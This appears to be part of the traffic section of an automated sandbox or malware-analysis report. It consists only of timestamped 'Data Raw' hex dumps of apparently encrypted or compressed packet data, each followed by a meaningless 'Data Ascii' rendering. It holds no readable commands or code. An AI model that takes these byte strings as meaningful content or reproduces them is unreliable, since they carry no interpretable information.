f3 04 e5 b8 ea e7 86 ad 41 10 94 2f 28 88 f3 27 e0 fa 13 af 78 87 a8 e1 70 e9 b4 ca 01 52 c4 f5 be 90 7a d1 32 a2 c4 42 98 87 57 f8 51 7b 43 ba 27 e5 77 cf 16 e6 b5 c3 e2 71 03
                          Data Ascii: X9K~C,5N7wbd%fHDA?G&e[}|2 wEBU%egzCY'r-ten{<h{Y2yobajQp["z&Vd5D"tKrETYwz.]Tjz}RSA/('xpRz2BWQ{C'wq
                          2022-01-13 19:22:18 UTC215INData Raw: 19 94 8b d9 c9 cc 30 db b6 24 31 23 2c 07 8f be 69 27 29 2a 78 68 9a 33 2c 52 d3 59 fa 8f dd 17 fd 87 ec 06 5c 48 24 24 c6 da 15 4d 98 ca 09 61 fc c7 b4 2d b0 5e 9a 5f 8f b9 64 7d 66 8b 8e cd 9b b9 a4 62 e8 39 43 9f fc 23 d9 a7 42 67 58 83 df 2f e9 68 3b e8 37 6b 82 27 49 ea c1 1a 05 c4 31 76 c2 ec 21 0c 69 1f bc af 5b eb 67 96 a1 a0 db 67 b5 52 81 b2 5f e0 f9 aa b7 7b 2c c3 5b 41 be a2 bf 7e ba af 6c dd de 57 4b e8 5d 80 87 5d ce 5b 50 76 f0 77 43 90 45 01 71 ed 47 e2 37 5c b6 56 11 9a 4a d9 0e 50 27 78 bf a4 99 57 4c bf 70 a8 4b a3 6c 47 e9 6f 36 66 6f 85 a9 e1 b6 72 17 e3 1c b4 d3 b7 95 cf 38 82 62 38 3e cf 6f 06 e4 8c df cd be 58 3f a1 8e fd 9a ac c9 1e 92 66 cc 5f f1 82 f4 90 f3 0a 51 b9 43 74 e4 62 98 dd 78 50 78 98 e5 a3 f1 f9 7d 92 20 95 15 c0 5d
                          Data Ascii: 0$1#,i')*xh3,RY\H$$Ma-^_d}fb9C#BgX/h;7k'I1v!i[ggR_{,[A~lWK]][PvwCEqG7\VJP'xWLpKlGo6for8b8>oX?f_QCtbxPx} ]
                          2022-01-13 19:22:18 UTC218INData Raw: e2 c1 78 5e 30 a3 a2 09 ab be 8a 36 f5 0c d5 74 3c 9d 40 5a 09 45 bb 5a ab f0 28 f0 ff e3 35 2e 27 b8 f1 81 28 b2 2e b8 bc c1 34 55 73 a7 e6 7e f0 68 01 b2 74 22 60 28 0c 6f ee a5 72 42 12 24 8a 7a 76 60 ba 33 db b9 a6 45 07 4d 8a 10 9e eb 30 b9 44 86 6a 3b 88 c2 b2 af c9 f3 db 01 09 b9 90 86 ef bb bc e6 c2 f8 48 e4 e4 ec a7 41 4a 92 98 f9 fb 9c 33 4d a6 0a 7a a0 84 27 18 91 4b 42 4a 65 74 fd 4d b5 e7 6d 05 47 18 5d 71 79 ff 07 44 aa 6b 3f 68 d4 c7 03 5c be 2e 69 2a bb 75 01 ad f2 7c 4a ef 51 04 03 7a c1 47 53 43 81 82 a6 1f 5b 69 0e be 86 8f 79 21 e5 42 69 15 56 5a 68 35 d4 31 3d bb 32 b3 84 42 26 b6 d0 27 c3 e0 8c 7b 07 e5 f6 5a 68 4b 2a 8f d3 a2 e2 1e 72 89 1f 2c 29 b8 fa 8a b9 82 8a 56 47 23 d8 72 15 75 08 b0 a7 c1 4b 86 fc 1f 17 42 92 a5 3b d6 f0 3b
                          Data Ascii: x^06t<@ZEZ(5.'(.4Us~ht"`(orB$zv`3EM0Dj;HAJ3Mz'KBJetMmG]qyDk?h\.i*u|JQzGSC[iy!BiVZh51=2B&'{ZhK*r,)VG#ruKB;;
                          2022-01-13 19:22:18 UTC222INData Raw: 90 1d 5d a0 3c 30 7b 1c 08 b5 1e 28 e1 e0 a6 68 2e 96 67 c6 7b 8c b7 bd 55 15 88 df ed e7 6e 7b e0 85 07 d5 f2 34 88 db 57 d2 63 5d 69 5e 3f 9b e5 32 0a bb b3 61 2f d9 51 ce dc c9 22 e4 a0 12 54 22 a3 8f 4b 73 2b 31 6c 5e b7 c7 ae db 73 b3 98 d9 34 b2 16 e0 15 e7 57 e5 82 08 68 4f b7 0a ed c1 36 5d 9d 04 39 51 53 a4 da bf 7e 1e 80 4e e0 e3 e6 4c ff 50 de 89 e1 4b e1 f7 9b a5 15 1b b1 da ee a1 72 1a dc 21 74 a2 2f ac 40 d5 45 2c f7 34 96 1b b6 83 a7 54 86 0f 79 94 cd f6 02 ac f6 36 96 48 d5 8d 3d cf 71 f5 8f f4 12 48 7f 7b b7 d6 69 49 a7 fb fb de 02 30 61 ed 76 4e 67 3a 1a f2 28 b7 84 53 f5 32 82 b5 f1 52 e0 e4 2a 56 18 92 92 5c 0c 1b 2c a2 09 29 80 70 2e b4 a9 13 c3 45 af 70 82 04 f3 92 1a f1 0f cf d9 c7 45 16 2a 26 8b 40 9a 23 bb f3 69 ed e0 62 df 44 ae
                          Data Ascii: ]<0{(h.g{Un{4Wc]i^?2a/Q"T"Ks+1l^s4WhO6]9QS~NLPKr!t/@E,4Ty6H=qH{iI0avNg:(S2R*V\,)p.EpE*&@#ibD
                          2022-01-13 19:22:18 UTC227INData Raw: 18 d5 21 5a ad 8d 56 8a d1 ea fc 09 87 0f 99 eb 98 a3 d4 82 6e 6b 8e 63 2f c4 30 88 39 17 70 70 81 77 25 5e 8b 5d 24 b2 91 9c b9 7f 47 fa a2 26 ab 42 71 83 e6 14 da 64 0e 7e 86 d1 eb 41 67 77 23 81 0d 06 03 46 3b 88 ec 37 36 36 fd 2d 34 50 67 6e e3 ef ae 5e 23 74 e1 a7 96 1a f7 cb 39 c0 91 7f 34 d5 fa 1f 2e 30 6e 0e aa bb a7 f2 0e 92 b8 de 33 35 17 64 98 1d e9 6e 73 65 81 ac be 96 59 9b 26 92 78 f7 9d 82 9b 6e 84 41 10 6b c8 f1 85 34 03 dc b4 72 c5 b3 65 21 14 7d 2b d6 52 11 be 41 58 d3 c0 0c b4 0b 9d 8d b9 00 c6 1a 73 8c 2d 17 d3 c7 c7 9a ed f7 27 f7 43 da 90 e6 98 49 25 da 7e af b6 c0 db cb 0a f3 03 27 c3 b9 57 3a 4b 97 51 63 11 fa 04 aa f5 f3 14 ed f6 86 59 37 3f e9 37 1a e2 a0 07 46 44 5b 63 bc 1a 69 9c 8e d3 d2 2d 49 02 89 3d 20 44 9f 07 90 bf ae 03
                          Data Ascii: !ZVnkc/09ppw%^]$G&Bqd~Agw#F;766-4Pgn^#t94.0n35dnseY&xnAk4re!}+RAXs-'CI%~'W:KQcY7?7FD[ci-I= D
                          2022-01-13 19:22:18 UTC231INData Raw: 8a d0 e9 ba b0 1d 7d a0 b5 63 a2 7c 4a f5 f1 f6 3d 12 e5 fc 44 0b 9a bb 8c 03 66 19 43 fa dc 7d f6 21 1d 20 e5 86 18 32 13 ec da 17 11 06 a3 b7 4b 3d 8a c4 8a 0c d6 61 6d 64 e7 97 17 1f 63 39 b7 d6 7e a0 b4 42 83 8d 24 fe 62 56 6b fb ac c7 a9 f9 50 bb 20 05 4c 51 78 d2 04 e8 e2 c5 26 aa ff 99 04 72 da bf d6 70 de 3a 8f f6 2c 8a 29 a7 12 09 a0 c5 b3 0c c4 37 54 46 2b a3 1f 5e 25 c9 20 85 3d 19 6d e9 d1 f0 c2 a1 03 d6 a0 05 94 3f c3 47 8d e9 42 8d 47 1e fd 4f d7 db d9 53 f4 73 ab d7 dd bb 8d 8b 19 6f 6f 71 29 ae d8 fb 7c 95 3c 00 47 49 c1 74 d3 7b 52 67 b8 2f 50 c4 46 f9 88 2c a7 06 73 50 af cd 4e 2e 90 3c 1e 15 79 29 1d 26 f4 35 07 74 de e0 5b 5d cb 97 e1 40 8e 6c be 08 25 52 c7 85 cd 46 2a 09 00 c6 d7 4d f2 1d e9 e8 b1 4a f7 7d 37 e2 57 87 0b f8 a9 d8 8d
                          Data Ascii: }c|J=DfC}! 2K=amdc9~B$bVkP LQx&rp:,)7TF+^% =m?GBGOSsooq)|<GIt{Rg/PF,sPN.<y)&5t[]@l%RF*MJ}7W
                          2022-01-13 19:22:18 UTC235INData Raw: a5 03 13 28 4f 2b 27 75 cd 87 8b 54 2c c8 94 2c 11 de 53 1d 8e 0d 48 52 af 06 df 6f 5d bd d1 2a bb 8c 5d a7 33 61 92 27 9a 80 21 30 a3 d7 67 0b 55 16 c1 11 12 74 dc db 3f c8 ad 94 32 06 4b a4 76 72 62 85 7a d8 30 bb 06 3b d9 f4 ff 22 2e 69 02 ae 17 a5 84 f5 a1 b2 c6 2d a3 c3 a0 83 34 1b ec f8 76 f2 11 70 c3 dd 97 5b 95 15 2d 3d 0d 61 88 d1 a5 30 6c d0 7f 28 11 45 e7 0c dc e3 1b 7c b8 53 68 71 65 a6 f1 bb b5 c1 3b 8a 67 83 17 f2 a3 1d a1 73 a4 dd d8 0e 23 8c f8 89 fc 4b e7 11 be 2b e2 40 b7 98 be ad 4c e4 51 f1 e9 8e 63 67 78 6d 6f b9 04 d8 73 ac 05 c8 57 63 bf 37 f7 03 2b 98 4e c2 84 4c bb 9a 0d 75 5c a9 16 b2 96 22 f0 ac 1a 0e 86 0d ef 53 11 1c de 66 11 7a 7a de a8 71 bf aa bd 4b 94 72 ea 8f 0a 3d f9 35 c3 23 f3 30 b4 43 f9 c9 7a 53 f6 c9 ab 6b 1e ed bd
                          Data Ascii: (O+'uT,,SHRo]*]3a'!0gUt?2Kvrbz0;".i-4vp[-=a0l(E|Shqe;gs#K+@LQcgxmosWc7+NLu\"SfzzqKr=5#0CzSk
                          2022-01-13 19:22:18 UTC239INData Raw: 39 c4 38 1e 05 97 42 df b0 40 6c 73 31 a6 3c d8 d6 88 5c ed 60 fd 77 f1 d2 5d 8b 5d 65 e7 61 33 df 52 be e4 eb 41 67 69 76 46 18 4a 5d 72 33 d9 f1 0c 8e a9 0e c4 86 e8 b7 b7 66 3e 5f 43 79 1e 5c 38 f2 93 df 84 b3 00 3c d1 ff f8 cd 92 ff 26 63 de d1 e5 4b a0 fd 45 24 62 be db 00 67 03 02 e3 38 2a 54 79 de 9c 7e ae 5a a4 c2 5d 84 bc b0 88 3a bd 69 3d b1 1b 69 0a 79 88 b3 0f 49 3f 39 bb 8f 5c a1 ce 49 01 3c fc fb 06 6a e3 58 42 e3 b8 fd 93 84 a9 c0 0b 50 33 32 8f 51 cd 2d a1 6d dd 1a e8 2a 63 92 ac 65 77 a8 31 a7 43 6a 3f f7 99 15 a5 84 79 93 53 7c fe a2 7f 7f 4c f4 51 e9 43 b1 9c d8 fa 3f a2 79 19 33 9c ea d2 64 e1 40 03 51 bb 5c aa fc e4 0b c2 05 df e0 af 48 0f 9b 3d 4f 7c bf 4a 36 bb 6a 5a 51 6e e5 2d c4 08 73 23 d5 76 21 51 89 6a ff da 17 35 96 11 f6 40
                          Data Ascii: 98B@ls1<\`w]]ea3RAgivFJ]r3f>_Cy\8<&cKE$bg8*Ty~Z]:i=iyI?9\I<jXBP32Q-m*cew1Cj?yS|LQC?y3d@Q\H=O|J6jZQn-s#v!Qj5@
                          2022-01-13 19:22:18 UTC243INData Raw: a0 34 cb cd 7c 09 0e 13 9d bc ed 07 11 b5 b8 40 07 36 08 64 8c 63 af b5 f9 98 00 63 1f 92 af 06 7d 2d e0 7c fa ab d0 e4 5e 2d 3f 62 b7 a0 65 84 75 6c d4 f0 84 32 db 39 03 e2 5f 2e 6e d0 c8 9f 13 04 00 44 95 cb b7 df 7d bd b0 50 00 8a 9c 0c be ce 3e f2 ae 5a 49 d6 ae 49 ba 9e 37 c1 69 1e cb 85 92 18 ce 77 0b 51 9e 3a 43 74 a7 0e fe 92 a4 1d 53 aa 0f af ba b1 3c 31 4f 7c 92 1a d8 7b 6c a1 8e 50 bb 96 fe d8 ef 81 28 c0 e1 67 80 96 03 4a 27 e1 35 42 1f 2e 04 41 d4 77 70 56 44 30 42 a8 b7 99 ad 76 eb 20 8e 80 8f f7 92 4a fb 2b 28 1c 6f 4f 8c 05 da e8 4c cf 09 af 42 97 76 d5 83 4e 53 78 b1 08 8e ce d3 82 37 97 61 25 0c a7 e5 17 6e b4 19 b5 32 88 87 94 00 08 dc 90 97 7b cb 68 55 87 dd 8e e7 85 28 60 e3 f2 6c fd 03 26 8f 61 7d bb d0 8b e4 f5 77 7d e7 21 3b de e1
                          Data Ascii: 4|@6dcc}-|^-?beul29_.nD}P>ZII7iwQ:CtS<1O|{lP(gJ'5B.AwpVD0Bv J+(oOLBvNSx7a%n2{hU(`l&a}w}!;
                          2022-01-13 19:22:18 UTC247INData Raw: a0 f9 5f 89 5b 82 cf 81 41 4b ce 03 d2 0a 46 30 e6 56 16 ab 6a 61 be 3e 09 c9 55 96 5c 01 0a 4c c8 11 dd e3 16 aa 20 9c 79 c6 ae db 65 f5 a6 e5 7b ca b7 4f 1f 1e 2a f7 73 d4 4d a0 a2 fc f6 ba 20 9c e1 e8 75 d9 d0 06 61 8c 8e 90 aa d2 31 66 4d a0 ca 16 64 74 90 97 c2 24 47 b4 1a 90 4e 25 de 62 a1 7d 20 9f 90 97 e2 6d 09 ca eb c1 5b 80 47 b4 36 ee cb 98 00 59 19 2e 7d cd 02 5d 1e 9b 9b 0e 27 0f 95 03 76 5c a7 68 de 62 2d 7a 1e 9b 7b c9 e5 d2 01 da 8e 92 6b e5 5f 8a 21 01 ae d9 88 a5 69 d0 34 db 15 16 99 ba 04 42 86 a2 9d 71 d8 74 58 18 bb b4 d7 f6 94 9d 51 a9 56 17 e4 50 e0 69 24 86 7a 47 65 f6 5e 09 2a f4 48 36 1d 19 a7 68 e0 69 79 c5 38 d5 25 0b 90 97 b0 dc ce 01 96 85 7c 4b e6 54 7c 4b d7 f5 52 2c 83 3b 2a f4 b2 c3 a6 e6 49 b8 dd e0 40 c4 14 a5 5c 02 68
                          Data Ascii: _[AKF0Vja>U\L ye{O*sM ua1fMdt$GN%b} m[G6Y.}]'v\hb-z{k_!i4BqtXQVPi$zGe^*H6hiy8%|KT|KR,;*I@\h
                          2022-01-13 19:22:18 UTC251INData Raw: 27 f9 33 99 06 fd 24 c5 a7 e8 52 b9 ba 83 31 2b 7c 10 b0 8f 1f 7e 44 bd b1 51 a1 b2 c8 d3 81 e4 5b 0e bd 2b 7d 71 d8 39 5c 58 10 e9 d6 08 43 57 92 b6 c2 eb c9 50 20 4c 29 85 37 df ec d9 f1 65 fe e7 de 27 07 ae d0 7f 38 c6 27 32 ee b5 40 45 b8 6c 6f a8 e4 58 12 a0 f2 9f 70 7a 4e 1c 9e c4 2d a0 fd c6 29 9b 08 ad 50 d0 03 5a 18 3f 44 66 7e f1 ca 52 2a ac d2 7c 4d 85 38 0f 3f d7 f0 90 92 7c 4e a5 61 23 01 8b 2f 74 5b 0d 37 11 3e cd 9c 26 8e 6b e7 97 04 22 81 3d 5d b8 ce de 62 f4 b5 c8 12 2a f4 10 ba 8a a8 59 9c bd bb d2 08 32 e7 a5 64 7c 4b be 3d 48 36 fd 29 54 13 1f 1d 2d 7b 07 c7 53 af 81 35 bf bf 58 1a 70 50 d3 8b df e5 5c 03 57 98 0c b2 5c 03 49 b9 20 9e 59 9d d5 8f b5 48 8c ae 6f ed 88 a5 20 9e aa d0 51 ab 3c dc 61 8e b0 dd d2 39 66 48 13 12 8f 94 af 6b
                          Data Ascii: '3$R1+|~DQ[+}q9\XCWP L)7e'8'2@EloXpzN-)PZ?Df~R*|M8?|Na#/t[7>&k"=]b*Y2d|K=H6)T-{S5XpP\W\I YHo Q<a9fHk
                          2022-01-13 19:22:18 UTC255INData Raw: 4b fa e3 b7 2b 47 85 0e 87 6b 90 c5 f3 6e 37 20 c2 74 1d 5c 41 11 5b b1 70 60 59 c8 51 dd bd eb 85 7a 04 19 49 89 17 1a a1 38 87 76 19 70 12 df b9 e0 2d 3f 01 83 5c 33 59 ad 67 b5 0a 1b 56 77 83 6b a0 be 7e 16 ce 30 d2 39 12 ec 17 70 02 23 50 75 8c f0 12 dc 3d 00 2e b9 e8 08 2e cd ae e9 89 7b 91 6f b8 8b 72 16 cf b2 f2 80 83 73 94 c0 7c 1f 61 cd dd b4 95 5d c4 4a 6e 2f 39 14 c3 97 36 df b0 9e aa 8c fd 74 37 61 be 0c f6 e9 89 65 a4 bf d0 34 db cd cb dd b8 8d 57 c4 45 80 83 0a 3f 1a d1 db ae 9b 4b fd 74 68 4e 14 94 ee 0e f7 68 3c 98 cb c5 9c c1 93 2d 27 52 79 da 78 42 96 d1 d8 34 be 67 cc 52 78 3a 8d 53 f0 17 59 ca 42 a8 dc 4f 97 77 97 73 9f 2d 00 0d 70 01 8f 56 65 a0 af 39 66 49 89 6e 3e ba 6c 24 c2 79 b2 95 57 fa 91 29 42 bb fe df ac 80 c8 4d f7 7b b7 1a
                          Data Ascii: K+Gkn7 t\A[p`YQzI8vp-?\3YgVwk~09p#Pu=..{ors|a]Jn/96t7ae4WE?KthNh<-'RyxB4gRx:SYBOws-pVe9fIn>l$yW)BM{
                          2022-01-13 19:22:18 UTC259INData Raw: 17 4a 0b 20 ae 85 0e e8 69 a2 ce 44 fe f4 84 e3 de 10 8b 3b 6a 21 31 20 ae 85 0e f2 80 e2 5c 55 a4 b6 fb 57 a8 fc 96 c6 1e cf b2 86 90 d3 bb f6 88 f8 8d 4f 97 75 eb d0 34 bf 8f 4a 0b 61 be 2c c9 d6 42 89 17 7f 01 89 17 79 f4 c5 9c e1 da 27 3e 90 a6 a5 55 c3 97 59 ad 15 16 c8 23 15 16 ec 72 01 ea 3d 6f dd d1 b6 fb 7d fc f9 0f 60 3c 98 b8 8f 24 de 53 ed f4 e7 e7 94 af 0e 87 57 a8 b9 81 69 d0 5d b6 bd 8a 98 b8 c8 23 a3 51 9b 3f 1d 28 af 6b bc 08 0d 04 11 0d 76 6d b6 fb 63 c3 e5 e3 b1 70 23 35 7d fc e2 5c 55 a4 bc 08 0a 7e 10 8b 69 d0 57 a8 b5 78 3c ec 72 64 45 80 e6 65 aa e0 39 66 07 f7 72 64 2b 47 e4 61 ce 30 bf 8f 4b 8e e1 da 4b 8e b4 f6 c4 1a a1 4c 20 ae ab 62 75 eb c0 11 34 db fd 18 a9 5e 08 79 f5 06 75 e8 47 85 0e 87 7c 7a 10 8b 75 eb b9 81 60 3c 80 83
                          Data Ascii: J iD;j!1 \UWOu4Ja,By'>UY#r=o}`<$SWi]#Q?(kvmcp#5}\U~iWx<rdEe9frd+Ga0KKL bu4^yuG|zu`<
                          2022-01-13 19:22:18 UTC264INData Raw: 04 0a cc d4 8d f3 f1 02 c7 0c 22 4c bd 21 e7 18 62 b6 04 8f f2 57 57 57 61 77 10 74 a4 1f d3 44 32 1a 5e c7 6c 9a 42 05 66 c5 27 c1 4b 0f 35 a2 0f d8 0a 81 9c 33 07 08 f5 fd 4c ef 52 ff c7 5f 0e 5e c7 5f 6a 8c 73 19 fb f0 99 c5 75 02 85 f1 2c 18 4c 72 15 67 bd 8a 66 b6 04 3d 6f dd d1 74 43 57 ea 91 9d f6 47 7a 93 c4 ea 91 f6 6a b9 7e a0 28 2b b8 20 4c fa 6e a9 ad 90 59 5f 54 d5 40 89 95 9f b7 c3 77 18 62 8d ec d0 cb 2e 4b 48 f8 71 16 67 33 89 c6 e1 25 f9 cc d4 c2 de 98 47 7a bb 4b 71 1d fc 45 7f fe 05 6f 16 67 8e 27 1e 55 eb 23 07 08 04 9e 91 d6 37 8b 5e c7 0d e4 b6 04 cc f6 77 10 59 73 0d fb f1 1d f7 f4 63 24 50 e6 aa 2f 9f 2a aa 8f 4b 8e 5d 49 76 24 b7 7d fc 26 aa f6 ab 9d e8 c5 55 5b 44 09 00 97 da a4 26 43 91 c7 55 5b 5f 4a fd e7 1f d4 c6 e1 25 c3 68
                          Data Ascii: "L!bWWWawtD2^lBf'K53LR_^_jsu,Lrgf=otCWGzj~(+ LnY_T@wb.KHqg3%GzKqEog'U#7^wYsc$P/*K]Iv$}&U[D&CU[_J%h
                          2022-01-13 19:22:18 UTC267INData Raw: 2e 32 29 d7 0f f6 77 6b 10 74 97 43 bc f7 f4 1d f8 70 9f f6 69 2c 36 2d bc f4 7b 04 8c 62 be d9 1d fd 29 20 cc 49 89 17 1a a1 4c 10 8b 1b 23 35 5d b6 fb 13 12 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 42 fa 91 29 42 f7 0b 00 68 06 75 eb f0 e5 e3 de 53 68 c5 17 91 d6 bb 7f fe 65 32 23 ca d8 a9 b1 8f db 25 d2 c6 e1 3e 15 e9 13 cc f5 f9 f0 ac 32 29 bd 59 7e 80 7c c3 29 a6 28 01 26 43 83 b4 3a 17 e5 58 e6 9a 42 43 b0 12 70 d6 8e 5d 49 3a 24 48 f8 3c 20 51 64 eb 3c 13 ed 5f 76 92 54 8b d7 3b 95 95 fe 65 38 40 39 99 c5 3d a3 ae 16 06 b9 7e 80 1f e0 a7 a6 4e d8 b9 7e ea a5 aa 1f a8 19 e0 a7 2c 09 04 8f ab a9 a2 31 a2 38 12 70 96 42 0c 7d 0a 88 63 3c 1a 57 5e e2 f4 2c 61 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91
                          Data Ascii: .2)wktCpi,6-{b) IL#5]$}2B)B)BhuShe2#%>2)Y~|)(&C:XBCp]I:$H< Qd<_vT;e8@9=~N~,18pB}c<W^,a}2B)B)B)B)B
                          2022-01-13 19:22:18 UTC271INData Raw: e6 9a 58 cf 57 57 4e f2 66 b6 1c 41 9f b7 94 46 ea 91 9b 8d 92 e3 b3 19 72 64 ba fb ec 72 64 45 80 bc 08 79 f4 32 f2 a4 e5 1c 27 bf 3c 13 d9 03 11 f2 47 42 05 0c 42 3a 17 e5 59 17 e5 1c 13 a7 a6 28 70 d0 cb 56 8c 34 24 48 c0 d6 bd 75 14 6e a4 2c 1b e9 13 ed 74 e8 a5 aa 8b 76 f2 7f 78 f2 33 a6 bc 65 58 d5 79 32 0f f6 77 1f d3 44 01 18 62 be e0 b4 09 04 bf 40 0a 81 c9 69 2f af a7 95 cd 51 57 64 ba fb df 19 e0 a7 95 fe 65 38 28 0c 7d 03 7d 6f 1b dc e9 81 65 38 1d b8 cf 4d 6d 6a 1f d3 44 4d df 2a 29 fc d9 37 ad b2 a7 a6 64 ad 3b 95 82 5f 45 7f b1 a8 23 ca 97 ee 88 6a 84 6c bd 75 0f ed 10 74 8d c5 79 0b e6 83 ec 8d c7 47 62 be bd 3b db 85 63 ae 84 8c 61 41 87 13 12 8f 24 f2 80 83 0a c6 3a cc 1e 55 26 3e 5e c7 72 b0 1e 55 69 1f da b5 b2 39 9f b7 b8 39 9f b7 bd
                          Data Ascii: XWWNfAFrdrdEy2'<GBB:Y(pV4$Hun,tvx3eXy2wDb@i/QWde8(}}oe8MmjDM*)7d;_E#jlutyGb;caA$:U&>^rUi99
                          2022-01-13 19:22:18 UTC287INData Raw: fa 91 29 df 9b 3f 73 7a 86 90 a6 65 4b 8e a2 52 f7 0b 00 f4 54 22 b3 cc e3 de 53 03 2e cd ae 75 4b 8e a2 76 a5 55 a4 4f 05 f3 02 f0 0c 82 87 ab aa e0 58 b6 8a 99 3a 74 3b 6a 52 a4 b3 74 68 d2 74 68 4e 88 95 32 d6 fb 43 7c 7a ed 16 98 b8 64 a5 55 a4 6a 06 75 eb 6b 72 64 45 1b 6f dd d1 04 fc 96 b4 6d 9c c1 93 b6 d3 bb 86 29 02 6c 57 32 0e 87 13 88 91 29 42 43 60 3c ec eb 4d 92 ab fb 63 c3 97 84 4c 10 8b 83 f7 0b 00 f0 c3 97 36 67 30 d2 39 fe 2a c5 9c 59 f1 fd 18 2f dc 4f 97 ae a1 4c 10 13 22 b3 74 da c6 1e aa 78 58 2a c5 0b f0 7b f8 3f ff 1c a6 40 26 bc 08 ee cb a9 5e 80 5f ba 04 e7 52 1d 28 57 80 83 0a c6 ca 27 3e 66 68 4e 14 01 5a 2f 50 ab a2 ce 30 47 2d 4b 8e 37 15 16 98 00 b8 ff 1c 33 37 61 be 99 6a 52 1d 9a 31 54 22 26 8e a2 ce a5 75 eb f0 c3 03 ee 77
                          Data Ascii: )?szeKRT"S.uKvUOX:t;jRththN2C|zdUjukrdEom)lW2)BC`<McL6g09*Y/OL"txX*{?@&^_R(W'>fhNZ/P0G-K737ajR1T"&uw
                          2022-01-13 19:22:18 UTC299INData Raw: 54 f0 48 c4 91 65 c7 a0 cf 22 a6 28 d0 42 71 aa 3e 7a 3e ea 85 39 ed bc 08 79 c8 19 22 3e b9 a1 a0 49 c1 c4 0a 5a 5b 38 ac ed d0 68 c7 e8 a5 99 f6 44 32 1a 62 69 14 17 52 e2 a3 bc 33 b1 75 9f 81 80 cb a9 5e 0c ff 11 86 d8 6e b7 fe d2 f5 ca eb 3c 20 62 8d ec be c0 dd 1d e4 ad ab ae 25 f9 52 3d ab e1 92 6a d9 09 6f d2 f9 0f 09 fe a2 4f 5e 0b 01 61 f6 62 ca 6f fd f4 07 bf da 0a b2 3e 3d a3 9d 8f e8 a5 99 f6 44 32 1a 6d 15 d5 e2 7c be 8f 6c c7 5f 45 7e 07 1f 2c c9 a5 5d 0f e3 55 ec 52 f1 7e 37 34 9b f3 ce fc 5a e3 12 43 bf d2 19 db 4e 5c a3 ae 16 63 26 54 2a 4e c5 17 52 1c 2d 03 04 fb 5b 91 c5 1f 64 10 cb 65 0b cc e7 2b 8b d8 56 e2 df 9d 4b aa bc 83 46 27 2a 4e 58 db bf 5c 08 34 c0 95 77 10 74 98 b8 64 c8 6e ab 62 a3 d0 75 8d 35 2e 1e 91 64 45 80 83 1a 84 90
                          Data Ascii: THe"(Bq>z>9y">IZ[8hD2biR3u^n< b%R=joO^abo>=D2m|l_E~,]UR~74ZCN\c&T*NR-[de+VKF'*NX\4wtdnbu5.dE
                          2022-01-13 19:22:18 UTC315INData Raw: 8b 53 bf ab 16 13 5e 10 af 17 91 65 e7 c3 d3 c4 15 e5 3a 63 8b c1 97 26 b3 af 68 06 6f 36 34 a9 91 12 c7 79 7f 49 99 fa 12 c7 ae 9c f1 c4 56 27 75 66 01 28 c3 df d1 56 e7 af a8 57 e0 70 35 d6 0a 41 0b df ee 3f 73 e6 20 c6 0b ff d2 b2 ba 04 70 24 4e 01 15 e8 e2 19 d2 b2 ba f2 b3 31 54 22 b3 e6 e1 d5 40 70 28 1b 10 8b 1b 66 fa 84 73 28 4b c6 17 6e ad e2 14 90 49 48 4f bf f2 ab 2a f5 7b 73 ae e9 ec 37 94 ba fb d9 43 34 29 c9 ed 1d a3 19 2f bc 8b 53 c8 62 17 5b e6 7d d8 32 5f f2 90 82 eb 79 bc 00 4c 4c 99 72 a8 10 47 49 45 4c dc 8c c1 a3 95 b1 38 ac c1 e7 6c 1f 6c 73 ba 8f 6c 57 a8 99 b9 94 50 d2 b2 ba 0d 70 bb 03 a6 d7 c4 5c b2 e7 18 52 96 fc 9f 3c 13 97 7e b5 7c 05 fc 65 e7 c3 d3 ab 6d f1 d9 8c 17 52 d4 3e b9 a1 68 0a f7 43 bc 3b 73 95 fa aa a8 d8 ae 28 88
                          Data Ascii: S^e:c&ho64yIV'uf(VWp5A?s p$N1T"@p(fs(KnIHO*{s7C4)/Sb[}2_yLLrGIEL8llslWPp\R<~|emR>hC;s(
                          2022-01-13 19:22:18 UTC331INData Raw: 8f 20 ed 33 59 ad 67 17 9f 47 86 6e d8 07 e6 19 1b 58 13 12 8f a3 1c b3 8b d0 bf c7 a9 2a 05 76 25 3a e8 d3 10 8e 29 0a 7e 7f 86 f2 95 cd 65 4c 58 23 41 b8 7a 3e f1 fd a2 6e 5e b3 3c ec 72 e3 a9 4b 71 29 c9 ed f4 84 88 95 8a d8 46 03 ee a7 7d 68 c5 d4 2a b1 b0 68 06 75 eb 4a c0 14 1f 64 3d 2c 40 bd 4d 19 57 ab 89 17 1a 26 1f 39 99 32 a2 0e 02 24 b7 7d 47 9b 3a 63 8b 1b 23 4a 14 7c 3a 93 a4 9b 17 61 37 2d 77 84 05 cb c2 9c 85 0e 87 13 9a 3e 78 39 16 bc 4c 9b 77 ef f9 0f 89 94 26 f4 b4 b4 7b bc 08 79 f4 1c 82 03 65 8f 04 33 d0 7c 7a 76 6d 49 ad e3 55 ec 3a a3 dc 07 ef ba 8d 10 e8 e0 14 46 30 d2 39 e3 77 fa 6e 4b cd 27 76 aa 6b 9d 40 80 bb bf e9 e9 98 78 f4 cc 2b 47 85 be 28 44 75 a3 59 ee fe 65 f4 44 01 ea 6e e7 40 f0 ba 0b f0 7f 7a ff 2f d9 8c 9e c5 9c c0
                          Data Ascii: 3YgGnX*v%:)~eLX#Az>n^<rKq)F}h*huJd=,@MW&92$}G:c#J|:a7-w>x9Lw&{ye3|zvmIU:F09wnK'vk@x+G(DuYeDn@z/
                          2022-01-13 19:22:18 UTC347INData Raw: f1 f5 06 75 ea 6a 66 6d b8 8b 7a 12 e6 4b 8e a2 ce 30 d2 39 66 49 89 17 1a a1 4c 13 12 8f 24 a3 50 1a a1 4c 10 83 0a 7e 7f 15 24 93 4c 64 24 d3 d2 17 1a a1 4c 10 8b 1b 23 35 5d b6 fb 13 12 8f 24 b7 7d fc 97 35 5d b6 fb 15 16 98 b1 30 d2 39 66 49 fa e2 3e df d5 bf 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 43 7f 01 ea 6e 59 ad 67 cc 1b 23 35 5d d7 b0 8c fa bf 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 42 fa 90 a5 55 a4 d3 ba 04 70 78 a1 4c 10 8b 6f a5 30 a6 f9 0f 0a 7e 7f 01 e2 5c 33 5b ed f4 84 e7 89 62 29 36 b9 81 06 75 eb f0 73 e6 65 c6 1a a1 4c 10 ee 1a c0 7f 69 d0 34 db cd ae e9 ec 72 64 45 80 